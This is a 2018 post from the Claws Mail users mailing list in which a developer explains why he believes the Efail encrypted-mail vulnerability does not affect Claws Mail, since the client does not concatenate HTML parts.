[Users] Efail: Claws Mail status

Colin Leroy colin at colino.net
Thu May 17 10:16:52 CEST 2018


On Tue, 15 May 2018 08:47:55 +0300, Shai Berger <shai at platonix.com>
wrote:

Hello,

> The main vector for using the vulnerability is HTML mail, which Claws
> does not support by default. As far as I could see, there was no
> specific reference to the HTML plugins; as far as I understand, Claws
> with an HTML plugin (like Fancy) should get the same score as, e.g.
> KMail (that is, vulnerability can be abused but requires user
> interaction to do so).

From what I understand, the Efail attack works when the MUA
concatenates multiple HTML parts for display:

    https://www.ghacks.net/2018/05/14/openpgp-and-s-mime-vulnerability-efail-discovered/

Even when using an HTML-rendering plugin like Fancy, Claws Mail only
displays one HTML part at a time and does not concatenate them.

Therefore I think it is completely safe. I'll ask the GnuPG people just
to make sure.
-- 
Colin
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL: <http://lists.claws-mail.org/pipermail/users/attachments/20180517/426728c7/attachment.sig>


More information about the Users mailing list